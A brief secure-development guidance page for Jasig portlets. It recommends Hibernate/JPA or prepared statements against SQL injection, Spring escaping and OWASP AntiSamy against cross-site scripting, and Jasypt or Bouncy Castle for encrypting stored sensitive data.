SQL Injection

Most Jasig code uses Hibernate or Hibernate backed JPA. Code which does not use these technologies should at least use prepared statements.

Cross-side Scripting (XSS)

Many Jasig porlets make use of Spring's escapeBody tag to perform HTML and JavaScript escaping.

The Manchester News Reader portlet uses OWASP Anti-Samy to clean dangerous tags from RSS feeds. This tool allows a developer to configurably strip HTML tags from proxied content.

Encryption of sensitive data

Most portlets should not need to store user passwords. However, for a portlet that does store potentially sensitive data, user data should be encrypted using some secure algorithm. Useful encryption resources might include Jasypt or Bouncy Castle.

Security resources

Browser not supported